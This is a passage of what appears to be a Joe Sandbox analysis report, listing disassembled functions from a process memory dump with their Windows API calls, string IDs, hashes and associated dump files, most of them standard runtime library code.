                                                                                                                                            • Opcode Fuzzy Hash: 1bd93e787f5ec5155a8590ebf47cef9d413cb4c690577584198bda05d19f006d
                                                                                                                                            • Instruction Fuzzy Hash: 7C11CE1AE2062A87DB342F6C8800336E2E4DF50794F65087FDA89CB392E6E58CD183D0
                                                                                                                                            Function 00315978 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,0031596F,00314900,0031358F), ref: 00315986
                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00315994
                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003159AD
                                                                                                                                            • SetLastError.KERNEL32(00000000,0031596F,00314900,0031358F), ref: 003159FF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                            • Opcode ID: e34fefb5c6871639e2a7269f68f1e5dd4ab8f7e145e269e2293a70e5c21c24ca
                                                                                                                                            • Instruction ID: 6e813929a4aafefcaf977012af02a4128471d490cc54f7b88dcaf41784627be2
                                                                                                                                            • Opcode Fuzzy Hash: e34fefb5c6871639e2a7269f68f1e5dd4ab8f7e145e269e2293a70e5c21c24ca
                                                                                                                                            • Instruction Fuzzy Hash: 9C01D87721EB21DFA6BF2BB57C86ADA2B5CDB4A775B20032AF4148C1F1EF115C815181
                                                                                                                                            Function 003035F7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 282COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strcspn$H_prolog3_ctype
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 838279627-1316489359
                                                                                                                                            • Opcode ID: f795058f8e6ae9bc1b0fb4783147f3de85f2a5a68caacad6412fa0417f677c96
                                                                                                                                            • Instruction ID: 88092b232f1f87001e922ce9a01e06b1c6a1ccff28fc5bafa927b598801333d7
                                                                                                                                            • Opcode Fuzzy Hash: f795058f8e6ae9bc1b0fb4783147f3de85f2a5a68caacad6412fa0417f677c96
                                                                                                                                            • Instruction Fuzzy Hash: F8B16CB590124D9FCF16DF98C890AEEBBB9FF48310F144029E805AB291D730AA55CB60
                                                                                                                                            Function 002FDA6F Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strcspn$H_prolog3_ctype
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 838279627-1316489359
                                                                                                                                            • Opcode ID: ea682c2470d44973850f303ee5092108eefbc54089af029ee958dd1de336e068
                                                                                                                                            • Instruction ID: d38b0da992ff61c8c68f67a3c8fed05e10f8688d959acc8401b6046c30f5f3ec
                                                                                                                                            • Opcode Fuzzy Hash: ea682c2470d44973850f303ee5092108eefbc54089af029ee958dd1de336e068
                                                                                                                                            • Instruction Fuzzy Hash: 2BB14A7191024D9FDF11DF94C941AEEFBBAEF08380F14402AE905AB215D770AE66CB64
                                                                                                                                            Function 002F3230 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 260fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetTempFileNameW.KERNEL32(?,URL,00000000,?,7642E7B1,?,00000004), ref: 002F3294
                                                                                                                                            • MoveFileW.KERNEL32(?,00000000), ref: 002F354A
                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 002F3592
                                                                                                                                              • Part of subcall function 002F1A70: LocalAlloc.KERNEL32(00000040,80000022), ref: 002F1AF7
                                                                                                                                              • Part of subcall function 002F1A70: LocalFree.KERNEL32(7FFFFFFE), ref: 002F1B7D
                                                                                                                                              • Part of subcall function 002F2E60: LocalFree.KERNEL32(?,7642E7B1,?,?,00333C40,000000FF,?,002F1242,7642E7B1,?,?,00333C75,000000FF), ref: 002F2EB1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileLocal$Free$AllocDeleteMoveNameTemp
                                                                                                                                            • String ID: URL$url
                                                                                                                                            • API String ID: 853893950-346267919
                                                                                                                                            • Opcode ID: d5b8c86f6b2942188bd9b00dbac6a5f5455326199d4c35002f8ab39967ac7e62
                                                                                                                                            • Instruction ID: 7e41f855df1246416d9a40fdd1811cc0ae79328b98be7b17c7761fa2342cf97c
                                                                                                                                            • Opcode Fuzzy Hash: d5b8c86f6b2942188bd9b00dbac6a5f5455326199d4c35002f8ab39967ac7e62
                                                                                                                                            • Instruction Fuzzy Hash: 6CC16770D2426D9ADB25DF24CC987E9BBB4BF14304F1042E9D409A7291EBB56B98CF90
                                                                                                                                            Function 00315A58 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AdjustPointer
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 1740715915-1316489359
                                                                                                                                            • Opcode ID: c4c7f6d45945aebe5121979a08fa6d6452fc600284b71bd9f4cf52e97efe3520
                                                                                                                                            • Instruction ID: 2c58f2bb72de0643e5810d6c972c278b84e3d119fea7cd0e78c821ddf637f2ae
                                                                                                                                            • Opcode Fuzzy Hash: c4c7f6d45945aebe5121979a08fa6d6452fc600284b71bd9f4cf52e97efe3520
                                                                                                                                            • Instruction Fuzzy Hash: 6451C4B2605B06DFDB2F8F54D841BEA77A4EF88311F158529E8059B691E731ECC0C790
                                                                                                                                            Function 002F36D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129libraryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 002F3735
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00334215,000000FF), ref: 002F381A
                                                                                                                                              • Part of subcall function 002F2310: GetProcessHeap.KERNEL32 ref: 002F2365
                                                                                                                                              • Part of subcall function 002F46F0: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,002F3778,-00000010,?,?,?,00334215,000000FF), ref: 002F4736
                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 002F37C6
                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00334215,000000FF), ref: 002F37DB
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystem_wcschr
                                                                                                                                            • String ID: ntdll.dll
                                                                                                                                            • API String ID: 3941625479-2227199552
                                                                                                                                            • Opcode ID: 7dda589592918b13ee7a232aef8925e06c46019b1fd6fbf27ea5dee462ba848d
                                                                                                                                            • Instruction ID: cdc8df5c7c10c8a2468d116f059e7114bdc06e5d1e0d30cf5a11ac0ddb4c8ad7
                                                                                                                                            • Opcode Fuzzy Hash: 7dda589592918b13ee7a232aef8925e06c46019b1fd6fbf27ea5dee462ba848d
                                                                                                                                            • Instruction Fuzzy Hash: 9F41A4B1A1060A9FDB14EF68CC45BBEF7E4FF14350F144629EA16D7281EBB4AA14CB50
                                                                                                                                            Function 0030D3CB Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 104COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0030D3D2
                                                                                                                                              • Part of subcall function 0030254E: __EH_prolog3.LIBCMT ref: 00302555
                                                                                                                                              • Part of subcall function 0030254E: std::_Lockit::_Lockit.LIBCPMT ref: 0030255F
                                                                                                                                              • Part of subcall function 0030254E: std::_Lockit::~_Lockit.LIBCPMT ref: 003025D0
                                                                                                                                            • _Find_elem.LIBCPMT ref: 0030D46E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                            • String ID: 21$%.0Lf$0123456789-
                                                                                                                                            • API String ID: 2544715827-1972204205
                                                                                                                                            • Opcode ID: 582adda944c7a5100f0e179f63401c1aeb4a4cf6e460876231fc43951fce3688
                                                                                                                                            • Instruction ID: 9d291816d6cebe71ab377a9e61d7a9cdc55d13185d079e08bd6234f2cc1805ad
                                                                                                                                            • Opcode Fuzzy Hash: 582adda944c7a5100f0e179f63401c1aeb4a4cf6e460876231fc43951fce3688
                                                                                                                                            • Instruction Fuzzy Hash: F9416D31911218DFCF16DFE4C891ADDBBB5FF08314F100159E801AB296DB70EA56CB91
                                                                                                                                            Function 0030D66F Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 104COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0030D676
                                                                                                                                              • Part of subcall function 002F8610: std::_Lockit::_Lockit.LIBCPMT ref: 002F8657
                                                                                                                                              • Part of subcall function 002F8610: std::_Lockit::_Lockit.LIBCPMT ref: 002F8679
                                                                                                                                              • Part of subcall function 002F8610: std::_Lockit::~_Lockit.LIBCPMT ref: 002F86A1
                                                                                                                                              • Part of subcall function 002F8610: std::_Lockit::~_Lockit.LIBCPMT ref: 002F880E
                                                                                                                                            • _Find_elem.LIBCPMT ref: 0030D712
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                            • String ID: 21$0123456789-$0123456789-
                                                                                                                                            • API String ID: 3042121994-155559277
                                                                                                                                            • Opcode ID: 86ae86440c6d7f2642ee962f0f5d1dc8a2619dd363d6c37ca644e013a9bb3fd8
                                                                                                                                            • Instruction ID: fb1221e3e1024c47a01fe79725a1f3fb68f6911bd65d09e648768eb1573eb139
                                                                                                                                            • Opcode Fuzzy Hash: 86ae86440c6d7f2642ee962f0f5d1dc8a2619dd363d6c37ca644e013a9bb3fd8
                                                                                                                                            • Instruction Fuzzy Hash: 53417C7191121CDFCF06EFE4C880AEEBBB5BF08350F500069E911AB295DB719A56CF91
                                                                                                                                            Function 0031175A Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 104COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 00311761
                                                                                                                                              • Part of subcall function 002F9270: std::_Lockit::_Lockit.LIBCPMT ref: 002F92A0
                                                                                                                                              • Part of subcall function 002F9270: std::_Lockit::_Lockit.LIBCPMT ref: 002F92C2
                                                                                                                                              • Part of subcall function 002F9270: std::_Lockit::~_Lockit.LIBCPMT ref: 002F92EA
                                                                                                                                              • Part of subcall function 002F9270: std::_Lockit::~_Lockit.LIBCPMT ref: 002F9422
                                                                                                                                            • _Find_elem.LIBCPMT ref: 003117FB
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                            • String ID: 21$0123456789-$0123456789-
                                                                                                                                            • API String ID: 3042121994-155559277
                                                                                                                                            • Opcode ID: 8c31a09abbfc657a830d2e3d98e071c60e3c3a5bc7fc7b9206058029fda20ed7
                                                                                                                                            • Instruction ID: 49c8360ce6a51143a02c024b23ce0d4e9ed19cfcafe225e477adf0eeb7285ff3
                                                                                                                                            • Opcode Fuzzy Hash: 8c31a09abbfc657a830d2e3d98e071c60e3c3a5bc7fc7b9206058029fda20ed7
                                                                                                                                            • Instruction Fuzzy Hash: BC415E3191120DDFCF1ADFA4D881AEEBBB5BF08314F10445AF911AB251DB349A56CF51
                                                                                                                                            Function 002F621F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 002F1A20: LocalFree.KERNEL32(?), ref: 002F1A42
                                                                                                                                              • Part of subcall function 00313E5A: RaiseException.KERNEL32(E06D7363,00000001,00000003,002F1434,?,?,002FD341,002F1434,00348B5C,?,002F1434,?,00000000), ref: 00313EBA
                                                                                                                                            • GetCurrentProcess.KERNEL32(7642E7B1,7642E7B1,?,?,00000000,00334981,000000FF), ref: 002F62EB
                                                                                                                                              • Part of subcall function 00312C98: EnterCriticalSection.KERNEL32(0034DD3C,?,?,?,002F23B6,0034E638,7642E7B1,?,?,00333D6D,000000FF), ref: 00312CA3
                                                                                                                                              • Part of subcall function 00312C98: LeaveCriticalSection.KERNEL32(0034DD3C,?,?,?,002F23B6,0034E638,7642E7B1,?,?,00333D6D,000000FF), ref: 00312CE0
                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 002F62B0
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 002F62B7
                                                                                                                                              • Part of subcall function 00312C4E: EnterCriticalSection.KERNEL32(0034DD3C,?,?,002F2427,0034E638,00336B40), ref: 00312C58
                                                                                                                                              • Part of subcall function 00312C4E: LeaveCriticalSection.KERNEL32(0034DD3C,?,?,002F2427,0034E638,00336B40), ref: 00312C8B
                                                                                                                                              • Part of subcall function 00312C4E: RtlWakeAllConditionVariable.NTDLL ref: 00312D02
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalSection$EnterLeave$AddressConditionCurrentExceptionFreeHandleLocalModuleProcProcessRaiseVariableWake
                                                                                                                                            • String ID: IsWow64Process$kernel32
                                                                                                                                            • API String ID: 1333104975-3789238822
                                                                                                                                            • Opcode ID: 665803782879b6aadfe01105d892d2d1c779b7c5ec024da9282d8958e5da904b
                                                                                                                                            • Instruction ID: 8c683930a882b931ce2033a3889d34761e5e768b92856d9fcc60df2ff7054a38
                                                                                                                                            • Opcode Fuzzy Hash: 665803782879b6aadfe01105d892d2d1c779b7c5ec024da9282d8958e5da904b
                                                                                                                                            • Instruction Fuzzy Hash: 1B2102B2D04319EFCB12DFA4DD46BAEB7A8FB18B50F100225FA119B2D0DB786910CA51
                                                                                                                                            Function 00308451 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Mpunct$GetvalsH_prolog3
                                                                                                                                            • String ID: $+xv
                                                                                                                                            • API String ID: 2204710431-1686923651
                                                                                                                                            • Opcode ID: 9933ecc51509b06d0949b492301ba7b8b43cb8f3f4ef3a3c08b0d73da0bca993
                                                                                                                                            • Instruction ID: 25f1d08acae7c2d14d36d5cc95ce2d3d5aca223b0fe1de97f7b39eefd198c3ee
                                                                                                                                            • Opcode Fuzzy Hash: 9933ecc51509b06d0949b492301ba7b8b43cb8f3f4ef3a3c08b0d73da0bca993
                                                                                                                                            • Instruction Fuzzy Hash: F221A7B1904B526EDB66DF79C49077BBEF8AB0C300F04495AE499C7A82D734D601CB90
                                                                                                                                            Function 002F6250 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32(7642E7B1,7642E7B1,?,?,00000000,00334981,000000FF), ref: 002F62EB
                                                                                                                                              • Part of subcall function 00312C98: EnterCriticalSection.KERNEL32(0034DD3C,?,?,?,002F23B6,0034E638,7642E7B1,?,?,00333D6D,000000FF), ref: 00312CA3
                                                                                                                                              • Part of subcall function 00312C98: LeaveCriticalSection.KERNEL32(0034DD3C,?,?,?,002F23B6,0034E638,7642E7B1,?,?,00333D6D,000000FF), ref: 00312CE0
                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 002F62B0
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 002F62B7
                                                                                                                                              • Part of subcall function 00312C4E: EnterCriticalSection.KERNEL32(0034DD3C,?,?,002F2427,0034E638,00336B40), ref: 00312C58
                                                                                                                                              • Part of subcall function 00312C4E: LeaveCriticalSection.KERNEL32(0034DD3C,?,?,002F2427,0034E638,00336B40), ref: 00312C8B
                                                                                                                                              • Part of subcall function 00312C4E: RtlWakeAllConditionVariable.NTDLL ref: 00312D02
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                                                                                            • String ID: IsWow64Process$kernel32
                                                                                                                                            • API String ID: 2056477612-3789238822
                                                                                                                                            • Opcode ID: 1d68002bc5bf2c68a792203a02946c1b0f765daf00b2f7c992da3d8d2a7fb27b
                                                                                                                                            • Instruction ID: 0af40bd3ee9421c8eb6a53a3f33c4965fae55b608f09ba71446cf20af3b8bb74
                                                                                                                                            • Opcode Fuzzy Hash: 1d68002bc5bf2c68a792203a02946c1b0f765daf00b2f7c992da3d8d2a7fb27b
                                                                                                                                            • Instruction Fuzzy Hash: 0011D2B6D08719EFCB12CF54DD45BAAB3A8F719B10F00026AED15972C0EB797900CA51
                                                                                                                                            Function 003169E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00316AA3,?,?,0034DDCC,00000000,?,00316BCE,00000004,InitializeCriticalSectionEx,003397E8,InitializeCriticalSectionEx,00000000), ref: 00316A72
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                            • String ID: api-ms-
                                                                                                                                            • API String ID: 3664257935-2084034818
                                                                                                                                            • Opcode ID: e5a24ab697af91d6018712480cafbf9bec458ecc1978d6b2941aa8570bb602a9
                                                                                                                                            • Instruction ID: 050a7e6012cdda33d142e4f4fbde728b19193cde43bd16a67297e919cbb14be9
                                                                                                                                            • Opcode Fuzzy Hash: e5a24ab697af91d6018712480cafbf9bec458ecc1978d6b2941aa8570bb602a9
                                                                                                                                            • Instruction Fuzzy Hash: 7B11CA72A05225EBCF378BA89C42BD933A89F05770F164150F914FB2C0D770ED4086D5
                                                                                                                                            Function 0030270D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302714
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030271E
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0030276F
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030278F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
